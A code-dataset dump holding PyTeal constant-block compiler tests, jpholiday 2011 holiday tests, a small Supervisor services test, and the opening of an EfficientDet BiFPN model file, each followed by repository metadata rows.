def test_createConstantBlocks_intblock_multiple():
ops = [
TealOp(None, Op.int, 1),
TealOp(None, Op.int, "OptIn"),
TealOp(None, Op.add),
TealOp(None, Op.int, 2),
TealOp(None, Op.int, "keyreg"),
TealOp(None, Op.add),
TealOp(None, Op.int, 3),
TealOp(None, Op.int, "ClearState"),
TealOp(None, Op.add),
]
expected = [
TealOp(None, Op.intcblock, 1, 2, 3),
TealOp(None, Op.intc_0, "//", 1),
TealOp(None, Op.intc_0, "//", "OptIn"),
TealOp(None, Op.add),
TealOp(None, Op.intc_1, "//", 2),
TealOp(None, Op.intc_1, "//", "keyreg"),
TealOp(None, Op.add),
TealOp(None, Op.intc_2, "//", 3),
TealOp(None, Op.intc_2, "//", "ClearState"),
TealOp(None, Op.add),
]
actual = createConstantBlocks(ops)
assert actual == expected
def test_createConstantBlocks_intblock_pushint():
ops = [
TealOp(None, Op.int, 1),
TealOp(None, Op.int, "OptIn"),
TealOp(None, Op.add),
TealOp(None, Op.int, 2),
TealOp(None, Op.int, 3),
TealOp(None, Op.add),
TealOp(None, Op.int, 3),
TealOp(None, Op.int, "ClearState"),
TealOp(None, Op.add),
]
expected = [
TealOp(None, Op.intcblock, 3, 1),
TealOp(None, Op.intc_1, "//", 1),
TealOp(None, Op.intc_1, "//", "OptIn"),
TealOp(None, Op.add),
TealOp(None, Op.pushint, 2, "//", 2),
TealOp(None, Op.intc_0, "//", 3),
TealOp(None, Op.add),
TealOp(None, Op.intc_0, "//", 3),
TealOp(None, Op.intc_0, "//", "ClearState"),
TealOp(None, Op.add),
]
actual = createConstantBlocks(ops)
assert actual == expected
def test_createConstantBlocks_pushbytes():
ops = [
TealOp(None, Op.byte, "0x0102"),
TealOp(None, Op.byte, "0x0103"),
TealOp(None, Op.method_signature, '"empty()void"'),
TealOp(None, Op.concat),
]
expected = [
TealOp(None, Op.pushbytes, "0x0102", "//", "0x0102"),
TealOp(None, Op.pushbytes, "0x0103", "//", "0x0103"),
TealOp(None, Op.pushbytes, "0xa88c26a5", "//", '"empty()void"'),
TealOp(None, Op.concat),
]
actual = createConstantBlocks(ops)
assert actual == expected
def test_createConstantBlocks_byteblock_single():
ops = [
TealOp(None, Op.byte, "0x0102"),
TealOp(None, Op.byte, "base64(AQI=)"),
TealOp(None, Op.concat),
TealOp(None, Op.byte, "base32(AEBA====)"),
TealOp(None, Op.concat),
]
expected = [
TealOp(None, Op.bytecblock, "0x0102"),
TealOp(None, Op.bytec_0, "//", "0x0102"),
TealOp(None, Op.bytec_0, "//", "base64(AQI=)"),
TealOp(None, Op.concat),
TealOp(None, Op.bytec_0, "//", "base32(AEBA====)"),
TealOp(None, Op.concat),
]
actual = createConstantBlocks(ops)
assert actual == expected
def test_createConstantBlocks_byteblock_multiple():
ops = [
TealOp(None, Op.byte, "0x0102"),
TealOp(None, Op.byte, "base64(AQI=)"),
TealOp(None, Op.concat),
TealOp(None, Op.byte, "base32(AEBA====)"),
TealOp(None, Op.concat),
TealOp(None, Op.byte, '"test"'),
TealOp(None, Op.concat),
TealOp(None, Op.byte, "base32(ORSXG5A=)"),
TealOp(None, Op.concat),
TealOp(
None,
Op.byte,
"0xb49276bd3ec0977eab86a321c449ead802c96c0bd97c2956131511d2f11eebec",
),
TealOp(None, Op.concat),
TealOp(
None, Op.addr, "WSJHNPJ6YCLX5K4GUMQ4ISPK3ABMS3AL3F6CSVQTCUI5F4I65PWEMCWT3M"
),
TealOp(None, Op.concat),
TealOp(None, Op.method_signature, '"closeOut()string"'),
TealOp(None, Op.concat),
TealOp(None, Op.byte, "base64(qfQrPQ==)"),
]
expected = [
TealOp(
None,
Op.bytecblock,
"0x0102",
"0x74657374",
"0xb49276bd3ec0977eab86a321c449ead802c96c0bd97c2956131511d2f11eebec",
"0xa9f42b3d",
),
TealOp(None, Op.bytec_0, "//", "0x0102"),
TealOp(None, Op.bytec_0, "//", "base64(AQI=)"),
TealOp(None, Op.concat),
TealOp(None, Op.bytec_0, "//", "base32(AEBA====)"),
TealOp(None, Op.concat),
TealOp(None, Op.bytec_1, "//", '"test"'),
TealOp(None, Op.concat),
TealOp(None, Op.bytec_1, "//", "base32(ORSXG5A=)"),
TealOp(None, Op.concat),
TealOp(
None,
Op.bytec_2,
"//",
"0xb49276bd3ec0977eab86a321c449ead802c96c0bd97c2956131511d2f11eebec",
),
TealOp(None, Op.concat),
TealOp(
None,
Op.bytec_2,
"//",
"WSJHNPJ6YCLX5K4GUMQ4ISPK3ABMS3AL3F6CSVQTCUI5F4I65PWEMCWT3M",
),
TealOp(None, Op.concat),
TealOp(None, Op.bytec_3, "//", '"closeOut()string"'),
TealOp(None, Op.concat),
TealOp(None, Op.bytec_3, "//", "base64(qfQrPQ==)"),
]
actual = createConstantBlocks(ops)
assert actual == expected
def test_createConstantBlocks_byteblock_pushbytes():
ops = [
TealOp(None, Op.byte, "0x0102"),
TealOp(None, Op.byte, "base64(AQI=)"),
TealOp(None, Op.concat),
TealOp(None, Op.byte, "base32(AEBA====)"),
TealOp(None, Op.concat),
TealOp(None, Op.byte, '"test"'),
TealOp(None, Op.concat),
TealOp(None, Op.byte, "base32(ORSXG5A=)"),
TealOp(None, Op.concat),
TealOp(
None, Op.addr, "WSJHNPJ6YCLX5K4GUMQ4ISPK3ABMS3AL3F6CSVQTCUI5F4I65PWEMCWT3M"
),
TealOp(None, Op.concat),
]
expected = [
TealOp(None, Op.bytecblock, "0x0102", "0x74657374"),
TealOp(None, Op.bytec_0, "//", "0x0102"),
TealOp(None, Op.bytec_0, "//", "base64(AQI=)"),
TealOp(None, Op.concat),
TealOp(None, Op.bytec_0, "//", "base32(AEBA====)"),
TealOp(None, Op.concat),
TealOp(None, Op.bytec_1, "//", '"test"'),
TealOp(None, Op.concat),
TealOp(None, Op.bytec_1, "//", "base32(ORSXG5A=)"),
TealOp(None, Op.concat),
TealOp(
None,
Op.pushbytes,
"0xb49276bd3ec0977eab86a321c449ead802c96c0bd97c2956131511d2f11eebec",
"//",
"WSJHNPJ6YCLX5K4GUMQ4ISPK3ABMS3AL3F6CSVQTCUI5F4I65PWEMCWT3M",
),
TealOp(None, Op.concat),
]
actual = createConstantBlocks(ops)
assert actual == expected
def test_createConstantBlocks_all():
ops = [
TealOp(None, Op.byte, "0x0102"),
TealOp(None, Op.byte, "base64(AQI=)"),
TealOp(None, Op.concat),
TealOp(None, Op.byte, "base32(AEBA====)"),
TealOp(None, Op.concat),
TealOp(None, Op.byte, '"test"'),
TealOp(None, Op.concat),
TealOp(None, Op.byte, "base32(ORSXG5A=)"),
TealOp(None, Op.concat),
TealOp(
None, Op.addr, "WSJHNPJ6YCLX5K4GUMQ4ISPK3ABMS3AL3F6CSVQTCUI5F4I65PWEMCWT3M"
),
TealOp(None, Op.concat),
TealOp(None, Op.int, 1),
TealOp(None, Op.int, "OptIn"),
TealOp(None, Op.add),
TealOp(None, Op.int, 2),
TealOp(None, Op.int, 3),
TealOp(None, Op.add),
TealOp(None, Op.int, 3),
TealOp(None, Op.int, "ClearState"),
TealOp(None, Op.add),
]
expected = [
TealOp(None, Op.intcblock, 3, 1),
TealOp(None, Op.bytecblock, "0x0102", "0x74657374"),
TealOp(None, Op.bytec_0, "//", "0x0102"),
TealOp(None, Op.bytec_0, "//", "base64(AQI=)"),
TealOp(None, Op.concat),
TealOp(None, Op.bytec_0, "//", "base32(AEBA====)"),
TealOp(None, Op.concat),
TealOp(None, Op.bytec_1, "//", '"test"'),
TealOp(None, Op.concat),
TealOp(None, Op.bytec_1, "//", "base32(ORSXG5A=)"),
TealOp(None, Op.concat),
TealOp(
None,
Op.pushbytes,
"0xb49276bd3ec0977eab86a321c449ead802c96c0bd97c2956131511d2f11eebec",
"//",
"WSJHNPJ6YCLX5K4GUMQ4ISPK3ABMS3AL3F6CSVQTCUI5F4I65PWEMCWT3M",
),
TealOp(None, Op.concat),
TealOp(None, Op.intc_1, "//", 1),
TealOp(None, Op.intc_1, "//", "OptIn"),
TealOp(None, Op.add),
TealOp(None, Op.pushint, 2, "//", 2),
TealOp(None, Op.intc_0, "//", 3),
TealOp(None, Op.add),
TealOp(None, Op.intc_0, "//", 3),
TealOp(None, Op.intc_0, "//", "ClearState"),
TealOp(None, Op.add),
]
actual = createConstantBlocks(ops)
assert actual == expected
def test_createConstantBlocks_tmpl_int():
ops = [
TealOp(None, Op.int, "TMPL_INT_1"),
TealOp(None, Op.int, "TMPL_INT_1"),
TealOp(None, Op.eq),
TealOp(None, Op.int, "TMPL_INT_2"),
TealOp(None, Op.add),
]
expected = [
TealOp(None, Op.intcblock, "TMPL_INT_1"),
TealOp(None, Op.intc_0, "//", "TMPL_INT_1"),
TealOp(None, Op.intc_0, "//", "TMPL_INT_1"),
TealOp(None, Op.eq),
TealOp(None, Op.pushint, "TMPL_INT_2", "//", "TMPL_INT_2"),
TealOp(None, Op.add),
]
actual = createConstantBlocks(ops)
assert actual == expected
def test_createConstantBlocks_tmpl_int_mixed():
ops = [
TealOp(None, Op.int, "TMPL_INT_1"),
TealOp(None, Op.int, "TMPL_INT_1"),
TealOp(None, Op.eq),
TealOp(None, Op.int, "TMPL_INT_2"),
TealOp(None, Op.add),
TealOp(None, Op.int, 0),
TealOp(None, Op.int, 0),
TealOp(None, Op.add),
TealOp(None, Op.int, 1),
TealOp(None, Op.add),
]
expected = [
TealOp(None, Op.intcblock, "TMPL_INT_1", 0),
TealOp(None, Op.intc_0, "//", "TMPL_INT_1"),
TealOp(None, Op.intc_0, "//", "TMPL_INT_1"),
TealOp(None, Op.eq),
TealOp(None, Op.pushint, "TMPL_INT_2", "//", "TMPL_INT_2"),
TealOp(None, Op.add),
TealOp(None, Op.intc_1, "//", 0),
TealOp(None, Op.intc_1, "//", 0),
TealOp(None, Op.add),
TealOp(None, Op.pushint, 1, "//", 1),
TealOp(None, Op.add),
]
actual = createConstantBlocks(ops)
assert actual == expected
def test_createConstantBlocks_tmpl_bytes():
ops = [
TealOp(None, Op.byte, "TMPL_BYTES_1"),
TealOp(None, Op.byte, "TMPL_BYTES_1"),
TealOp(None, Op.eq),
TealOp(None, Op.byte, "TMPL_BYTES_2"),
TealOp(None, Op.concat),
]
expected = [
TealOp(None, Op.bytecblock, "TMPL_BYTES_1"),
TealOp(None, Op.bytec_0, "//", "TMPL_BYTES_1"),
TealOp(None, Op.bytec_0, "//", "TMPL_BYTES_1"),
TealOp(None, Op.eq),
TealOp(None, Op.pushbytes, "TMPL_BYTES_2", "//", "TMPL_BYTES_2"),
TealOp(None, Op.concat),
]
actual = createConstantBlocks(ops)
assert actual == expected
def test_createConstantBlocks_tmpl_bytes_mixed():
ops = [
TealOp(None, Op.byte, "TMPL_BYTES_1"),
TealOp(None, Op.byte, "TMPL_BYTES_1"),
TealOp(None, Op.eq),
TealOp(None, Op.byte, "TMPL_BYTES_2"),
TealOp(None, Op.concat),
TealOp(None, Op.byte, "0x00"),
TealOp(None, Op.byte, "0x00"),
TealOp(None, Op.concat),
TealOp(None, Op.byte, "0x01"),
TealOp(None, Op.concat),
]
expected = [
TealOp(None, Op.bytecblock, "TMPL_BYTES_1", "0x00"),
TealOp(None, Op.bytec_0, "//", "TMPL_BYTES_1"),
TealOp(None, Op.bytec_0, "//", "TMPL_BYTES_1"),
TealOp(None, Op.eq),
TealOp(None, Op.pushbytes, "TMPL_BYTES_2", "//", "TMPL_BYTES_2"),
TealOp(None, Op.concat),
TealOp(None, Op.bytec_1, "//", "0x00"),
TealOp(None, Op.bytec_1, "//", "0x00"),
TealOp(None, Op.concat),
TealOp(None, Op.pushbytes, "0x01", "//", "0x01"),
TealOp(None, Op.concat),
]
actual = createConstantBlocks(ops)
assert actual == expected
def test_createConstantBlocks_tmpl_all():
ops = [
TealOp(None, Op.byte, "TMPL_BYTES_1"),
TealOp(None, Op.byte, "TMPL_BYTES_1"),
TealOp(None, Op.eq),
TealOp(None, Op.byte, "TMPL_BYTES_2"),
TealOp(None, Op.concat),
TealOp(None, Op.byte, "0x00"),
TealOp(None, Op.byte, "0x00"),
TealOp(None, Op.concat),
TealOp(None, Op.byte, "0x01"),
TealOp(None, Op.concat),
TealOp(None, Op.len),
TealOp(None, Op.int, "TMPL_INT_1"),
TealOp(None, Op.int, "TMPL_INT_1"),
TealOp(None, Op.eq),
TealOp(None, Op.int, "TMPL_INT_2"),
TealOp(None, Op.add),
TealOp(None, Op.int, 0),
TealOp(None, Op.int, 0),
TealOp(None, Op.add),
TealOp(None, Op.int, 1),
TealOp(None, Op.add),
TealOp(None, Op.eq),
]
expected = [
TealOp(None, Op.intcblock, "TMPL_INT_1", 0),
TealOp(None, Op.bytecblock, "TMPL_BYTES_1", "0x00"),
TealOp(None, Op.bytec_0, "//", "TMPL_BYTES_1"),
TealOp(None, Op.bytec_0, "//", "TMPL_BYTES_1"),
TealOp(None, Op.eq),
TealOp(None, Op.pushbytes, "TMPL_BYTES_2", "//", "TMPL_BYTES_2"),
TealOp(None, Op.concat),
TealOp(None, Op.bytec_1, "//", "0x00"),
TealOp(None, Op.bytec_1, "//", "0x00"),
TealOp(None, Op.concat),
TealOp(None, Op.pushbytes, "0x01", "//", "0x01"),
TealOp(None, Op.concat),
TealOp(None, Op.len),
TealOp(None, Op.intc_0, "//", "TMPL_INT_1"),
TealOp(None, Op.intc_0, "//", "TMPL_INT_1"),
TealOp(None, Op.eq),
TealOp(None, Op.pushint, "TMPL_INT_2", "//", "TMPL_INT_2"),
TealOp(None, Op.add),
TealOp(None, Op.intc_1, "//", 0),
TealOp(None, Op.intc_1, "//", 0),
TealOp(None, Op.add),
TealOp(None, Op.pushint, 1, "//", 1),
TealOp(None, Op.add),
TealOp(None, Op.eq),
]
actual = createConstantBlocks(ops)
assert actual == expected
def test_createConstantBlocks_intc():
"""Test scenario where there are more than 4 constants in the intcblock.
If the 4th constant can't fit in one varuint byte (more than 2**7) it
should be referenced with the Op.intc 4 command.
"""
ops = [
TealOp(None, Op.int, 0),
TealOp(None, Op.int, 0),
TealOp(None, Op.int, 1),
TealOp(None, Op.int, 1),
TealOp(None, Op.int, 2),
TealOp(None, Op.int, 2),
TealOp(None, Op.int, 3),
TealOp(None, Op.int, 3),
TealOp(None, Op.int, 2**7),
TealOp(None, Op.int, 2**7),
]
expected = [
TealOp(None, Op.intcblock, 0, 1, 2, 3, 2**7),
TealOp(None, Op.intc_0, "//", 0),
TealOp(None, Op.intc_0, "//", 0),
TealOp(None, Op.intc_1, "//", 1),
TealOp(None, Op.intc_1, "//", 1),
TealOp(None, Op.intc_2, "//", 2),
TealOp(None, Op.intc_2, "//", 2),
TealOp(None, Op.intc_3, "//", 3),
TealOp(None, Op.intc_3, "//", 3),
TealOp(None, Op.intc, 4, "//", 2**7),
TealOp(None, Op.intc, 4, "//", 2**7),
]
actual = createConstantBlocks(ops)
assert actual == expected
def test_createConstantBlocks_small_constant():
"""If a constant cannot be referenced using the intc_[0..3] commands
and it can be stored in one varuint it byte then Op.pushint is used.
"""
for cur in range(4, 2**7):
ops = [
TealOp(None, Op.int, 0),
TealOp(None, Op.int, 0),
TealOp(None, Op.int, 1),
TealOp(None, Op.int, 1),
TealOp(None, Op.int, 2),
TealOp(None, Op.int, 2),
TealOp(None, Op.int, 3),
TealOp(None, Op.int, 3),
TealOp(None, Op.int, cur),
TealOp(None, Op.int, cur),
]
expected = [
TealOp(None, Op.intcblock, 0, 1, 2, 3),
TealOp(None, Op.intc_0, "//", 0),
TealOp(None, Op.intc_0, "//", 0),
TealOp(None, Op.intc_1, "//", 1),
TealOp(None, Op.intc_1, "//", 1),
TealOp(None, Op.intc_2, "//", 2),
TealOp(None, Op.intc_2, "//", 2),
TealOp(None, Op.intc_3, "//", 3),
TealOp(None, Op.intc_3, "//", 3),
TealOp(None, Op.pushint, cur, "//", cur),
TealOp(None, Op.pushint, cur, "//", cur),
]
actual = createConstantBlocks(ops)
assert actual == expected
| 31.51194 | 121 | 0.541799 | 2,436 | 21,113 | 4.595238 | 0.082512 | 0.315348 | 0.378417 | 0.08442 | 0.871717 | 0.826425 | 0.796855 | 0.779346 | 0.754243 | 0.715383 | 0 | 0.059612 | 0.282527 | 21,113 | 669 | 122 | 31.559043 | 0.679364 | 0.019609 | 0 | 0.749129 | 0 | 0.003484 | 0.144924 | 0.049985 | 0 | 0 | 0.027485 | 0 | 0.038328 | 1 | 0.038328 | false | 0 | 0.003484 | 0 | 0.041812 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
d9ce432b1f76671887c34a0fad8ccd22100fd884 | 2,531 | py | Python | tests/test_year_2011.py | l0pht511/jpholiday | 083145737b61fad3420c066968c4329d17dc3baf | [
"MIT"
] | 179 | 2017-10-05T12:41:10.000Z | 2022-03-24T22:18:25.000Z | tests/test_year_2011.py | l0pht511/jpholiday | 083145737b61fad3420c066968c4329d17dc3baf | [
"MIT"
] | 17 | 2018-10-23T00:51:13.000Z | 2021-11-22T11:40:06.000Z | tests/test_year_2011.py | l0pht511/jpholiday | 083145737b61fad3420c066968c4329d17dc3baf | [
"MIT"
] | 17 | 2018-10-19T11:13:07.000Z | 2022-01-29T08:05:56.000Z | # coding: utf-8
import datetime
import unittest
import jpholiday
class TestYear2011(unittest.TestCase):
def test_holiday(self):
"""
2011年祝日
"""
self.assertEqual(jpholiday.is_holiday_name(datetime.date(2011, 1, 1)), '元日')
self.assertEqual(jpholiday.is_holiday_name(datetime.date(2011, 1, 10)), '成人の日')
self.assertEqual(jpholiday.is_holiday_name(datetime.date(2011, 2, 11)), '建国記念の日')
self.assertEqual(jpholiday.is_holiday_name(datetime.date(2011, 3, 21)), '春分の日')
self.assertEqual(jpholiday.is_holiday_name(datetime.date(2011, 4, 29)), '昭和の日')
self.assertEqual(jpholiday.is_holiday_name(datetime.date(2011, 5, 3)), '憲法記念日')
self.assertEqual(jpholiday.is_holiday_name(datetime.date(2011, 5, 4)), 'みどりの日')
self.assertEqual(jpholiday.is_holiday_name(datetime.date(2011, 5, 5)), 'こどもの日')
self.assertEqual(jpholiday.is_holiday_name(datetime.date(2011, 7, 18)), '海の日')
self.assertEqual(jpholiday.is_holiday_name(datetime.date(2011, 9, 19)), '敬老の日')
self.assertEqual(jpholiday.is_holiday_name(datetime.date(2011, 9, 23)), '秋分の日')
self.assertEqual(jpholiday.is_holiday_name(datetime.date(2011, 10, 10)), '体育の日')
self.assertEqual(jpholiday.is_holiday_name(datetime.date(2011, 11, 3)), '文化の日')
self.assertEqual(jpholiday.is_holiday_name(datetime.date(2011, 11, 23)), '勤労感謝の日')
self.assertEqual(jpholiday.is_holiday_name(datetime.date(2011, 12, 23)), '天皇誕生日')
def test_count_month(self):
"""
2011年月祝日数
"""
self.assertEqual(len(jpholiday.month_holidays(2011, 1)), 2)
self.assertEqual(len(jpholiday.month_holidays(2011, 2)), 1)
self.assertEqual(len(jpholiday.month_holidays(2011, 3)), 1)
self.assertEqual(len(jpholiday.month_holidays(2011, 4)), 1)
self.assertEqual(len(jpholiday.month_holidays(2011, 5)), 3)
self.assertEqual(len(jpholiday.month_holidays(2011, 6)), 0)
self.assertEqual(len(jpholiday.month_holidays(2011, 7)), 1)
self.assertEqual(len(jpholiday.month_holidays(2011, 8)), 0)
self.assertEqual(len(jpholiday.month_holidays(2011, 9)), 2)
self.assertEqual(len(jpholiday.month_holidays(2011, 10)), 1)
self.assertEqual(len(jpholiday.month_holidays(2011, 11)), 2)
self.assertEqual(len(jpholiday.month_holidays(2011, 12)), 1)
def test_count_year(self):
"""
2011年祝日数
"""
self.assertEqual(len(jpholiday.year_holidays(2011)), 15)
| 49.627451 | 90 | 0.679968 | 326 | 2,531 | 5.131902 | 0.184049 | 0.251046 | 0.215182 | 0.233114 | 0.803347 | 0.803347 | 0.803347 | 0.750747 | 0.481769 | 0.291692 | 0 | 0.096466 | 0.172659 | 2,531 | 50 | 91 | 50.62 | 0.702483 | 0.016199 | 0 | 0 | 0 | 0 | 0.02686 | 0 | 0 | 0 | 0 | 0 | 0.8 | 1 | 0.085714 | false | 0 | 0.085714 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
d9f82fcab6246e1f0b3a78199060e9cba44540b6 | 191 | py | Python | tests/services/test_data.py | peddamat/home-assistant-supervisor-test | 5da55772bcb2db3c6d8432cbc08e2ac9fbf480c4 | [
"Apache-2.0"
] | 597 | 2017-04-27T15:10:08.000Z | 2019-12-18T16:02:57.000Z | tests/services/test_data.py | peddamat/home-assistant-supervisor-test | 5da55772bcb2db3c6d8432cbc08e2ac9fbf480c4 | [
"Apache-2.0"
] | 1,056 | 2020-01-30T09:59:44.000Z | 2022-03-31T10:15:32.000Z | tests/services/test_data.py | peddamat/home-assistant-supervisor-test | 5da55772bcb2db3c6d8432cbc08e2ac9fbf480c4 | [
"Apache-2.0"
] | 295 | 2020-02-03T11:30:42.000Z | 2022-03-31T18:53:14.000Z | """Test services data."""
def test_data_initial(coresys):
"""Test initial data for services."""
assert coresys.services.data.mqtt == {}
assert coresys.services.data.mysql == {}
| 23.875 | 44 | 0.670157 | 23 | 191 | 5.478261 | 0.434783 | 0.285714 | 0.333333 | 0.396825 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.167539 | 191 | 7 | 45 | 27.285714 | 0.792453 | 0.267016 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.666667 | 1 | 0.333333 | false | 0 | 0 | 0 | 0.333333 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
8a3f94862bbdd215bd0169fff60f6746e29f1ecf | 29,436 | py | Python | model.py | Larxel/EfficientDet | 3a54e8fa7d2c3e23be2b90ac82b583460d7bfd42 | [
"Apache-2.0"
] | null | null | null | model.py | Larxel/EfficientDet | 3a54e8fa7d2c3e23be2b90ac82b583460d7bfd42 | [
"Apache-2.0"
] | null | null | null | model.py | Larxel/EfficientDet | 3a54e8fa7d2c3e23be2b90ac82b583460d7bfd42 | [
"Apache-2.0"
] | null | null | null | from functools import reduce
# from keras import layers
# from keras import initializers
# from keras import models
# from keras_ import EfficientNetB0, EfficientNetB1, EfficientNetB2
# from keras_ import EfficientNetB3, EfficientNetB4, EfficientNetB5, EfficientNetB6
import tensorflow as tf
from tensorflow.keras import layers
from tensorflow.keras import initializers
from tensorflow.keras import models
from tfkeras import EfficientNetB0, EfficientNetB1, EfficientNetB2
from tfkeras import EfficientNetB3, EfficientNetB4, EfficientNetB5, EfficientNetB6
from layers import ClipBoxes, RegressBoxes, FilterDetections, wBiFPNAdd, BatchNormalization
from initializers import PriorProbability
from utils.anchors import anchors_for_shape
import numpy as np
w_bifpns = [64, 64, 64, 64, 64, 64, 64]#[64, 88, 112, 160, 224, 288, 384]
d_bifpns = [3, 4, 4, 4, 4, 4, 4]#[3, 4, 5, 6, 7, 7, 8]
d_heads = [3, 3, 3, 3, 3, 3, 3]#[3, 3, 3, 4, 4, 4, 5]
image_sizes = [256, 256, 256, 256, 256, 256, 256]#[512, 640, 768, 896, 1024, 1280, 1408]
backbones = [EfficientNetB0, EfficientNetB1, EfficientNetB2,
EfficientNetB3, EfficientNetB4, EfficientNetB5, EfficientNetB6]
MOMENTUM = 0.997
EPSILON = 1e-4
def SeparableConvBlock(num_channels, kernel_size, strides, name, freeze_bn=False):
f1 = layers.SeparableConv2D(num_channels, kernel_size=kernel_size, strides=strides, padding='same',
use_bias=True, name=f'{name}/conv')
f2 = layers.BatchNormalization(momentum=MOMENTUM, epsilon=EPSILON, name=f'{name}/bn')
# f2 = BatchNormalization(freeze=freeze_bn, name=f'{name}/bn')
return reduce(lambda f, g: lambda *args, **kwargs: g(f(*args, **kwargs)), (f1, f2))
def ConvBlock(num_channels, kernel_size, strides, name, freeze_bn=False):
f1 = layers.Conv2D(num_channels, kernel_size=kernel_size, strides=strides, padding='same',
use_bias=True, name='{}_conv'.format(name))
f2 = layers.BatchNormalization(momentum=MOMENTUM, epsilon=EPSILON, name='{}_bn'.format(name))
# f2 = BatchNormalization(freeze=freeze_bn, name='{}_bn'.format(name))
f3 = layers.ReLU(name='{}_relu'.format(name))
return reduce(lambda f, g: lambda *args, **kwargs: g(f(*args, **kwargs)), (f1, f2, f3))
def build_wBiFPN(features, num_channels, id, freeze_bn=False):
if id == 0:
_, _, C3, C4, C5 = features
P3_in = C3
P4_in = C4
P5_in = C5
P6_in = layers.Conv2D(num_channels, kernel_size=1, padding='same', name='resample_p6/conv2d')(C5)
P6_in = layers.BatchNormalization(momentum=MOMENTUM, epsilon=EPSILON, name='resample_p6/bn')(P6_in)
# P6_in = BatchNormalization(freeze=freeze_bn, name='resample_p6/bn')(P6_in)
P6_in = layers.MaxPooling2D(pool_size=3, strides=2, padding='same', name='resample_p6/maxpool')(P6_in)
P7_in = layers.MaxPooling2D(pool_size=3, strides=2, padding='same', name='resample_p7/maxpool')(P6_in)
P7_U = layers.UpSampling2D()(P7_in)
P6_td = wBiFPNAdd(name=f'fpn_cells/cell_{id}/fnode0/add')([P6_in, P7_U])
P6_td = layers.Activation(lambda x: tf.nn.swish(x))(P6_td)
P6_td = SeparableConvBlock(num_channels=num_channels, kernel_size=3, strides=1,
name=f'fpn_cells/cell_{id}/fnode0/op_after_combine5')(P6_td)
P5_in_1 = layers.Conv2D(num_channels, kernel_size=1, padding='same',
name=f'fpn_cells/cell_{id}/fnode1/resample_0_2_6/conv2d')(P5_in)
P5_in_1 = layers.BatchNormalization(momentum=MOMENTUM, epsilon=EPSILON,
name=f'fpn_cells/cell_{id}/fnode1/resample_0_2_6/bn')(P5_in_1)
# P5_in_1 = BatchNormalization(freeze=freeze_bn, name=f'fpn_cells/cell_{id}/fnode1/resample_0_2_6/bn')(P5_in_1)
P6_U = layers.UpSampling2D()(P6_td)
P5_td = wBiFPNAdd(name=f'fpn_cells/cell_{id}/fnode1/add')([P5_in_1, P6_U])
P5_td = layers.Activation(lambda x: tf.nn.swish(x))(P5_td)
P5_td = SeparableConvBlock(num_channels=num_channels, kernel_size=3, strides=1,
name=f'fpn_cells/cell_{id}/fnode1/op_after_combine6')(P5_td)
P4_in_1 = layers.Conv2D(num_channels, kernel_size=1, padding='same',
name=f'fpn_cells/cell_{id}/fnode2/resample_0_1_7/conv2d')(P4_in)
P4_in_1 = layers.BatchNormalization(momentum=MOMENTUM, epsilon=EPSILON,
name=f'fpn_cells/cell_{id}/fnode2/resample_0_1_7/bn')(P4_in_1)
# P4_in_1 = BatchNormalization(freeze=freeze_bn, name=f'fpn_cells/cell_{id}/fnode2/resample_0_1_7/bn')(P4_in_1)
P5_U = layers.UpSampling2D()(P5_td)
P4_td = wBiFPNAdd(name=f'fpn_cells/cell_{id}/fnode2/add')([P4_in_1, P5_U])
P4_td = layers.Activation(lambda x: tf.nn.swish(x))(P4_td)
P4_td = SeparableConvBlock(num_channels=num_channels, kernel_size=3, strides=1,
name=f'fpn_cells/cell_{id}/fnode2/op_after_combine7')(P4_td)
P3_in = layers.Conv2D(num_channels, kernel_size=1, padding='same',
name=f'fpn_cells/cell_{id}/fnode3/resample_0_0_8/conv2d')(P3_in)
P3_in = layers.BatchNormalization(momentum=MOMENTUM, epsilon=EPSILON,
name=f'fpn_cells/cell_{id}/fnode3/resample_0_0_8/bn')(P3_in)
# P3_in = BatchNormalization(freeze=freeze_bn, name=f'fpn_cells/cell_{id}/fnode3/resample_0_0_8/bn')(P3_in)
P4_U = layers.UpSampling2D()(P4_td)
P3_out = wBiFPNAdd(name=f'fpn_cells/cell_{id}/fnode3/add')([P3_in, P4_U])
P3_out = layers.Activation(lambda x: tf.nn.swish(x))(P3_out)
P3_out = SeparableConvBlock(num_channels=num_channels, kernel_size=3, strides=1,
name=f'fpn_cells/cell_{id}/fnode3/op_after_combine8')(P3_out)
P4_in_2 = layers.Conv2D(num_channels, kernel_size=1, padding='same',
name=f'fpn_cells/cell_{id}/fnode4/resample_0_1_9/conv2d')(P4_in)
P4_in_2 = layers.BatchNormalization(momentum=MOMENTUM, epsilon=EPSILON,
name=f'fpn_cells/cell_{id}/fnode4/resample_0_1_9/bn')(P4_in_2)
# P4_in_2 = BatchNormalization(freeze=freeze_bn, name=f'fpn_cells/cell_{id}/fnode4/resample_0_1_9/bn')(P4_in_2)
P3_D = layers.MaxPooling2D(pool_size=3, strides=2, padding='same')(P3_out)
P4_out = wBiFPNAdd(name=f'fpn_cells/cell_{id}/fnode4/add')([P4_in_2, P4_td, P3_D])
P4_out = layers.Activation(lambda x: tf.nn.swish(x))(P4_out)
P4_out = SeparableConvBlock(num_channels=num_channels, kernel_size=3, strides=1,
name=f'fpn_cells/cell_{id}/fnode4/op_after_combine9')(P4_out)
P5_in_2 = layers.Conv2D(num_channels, kernel_size=1, padding='same',
name=f'fpn_cells/cell_{id}/fnode5/resample_0_2_10/conv2d')(P5_in)
P5_in_2 = layers.BatchNormalization(momentum=MOMENTUM, epsilon=EPSILON,
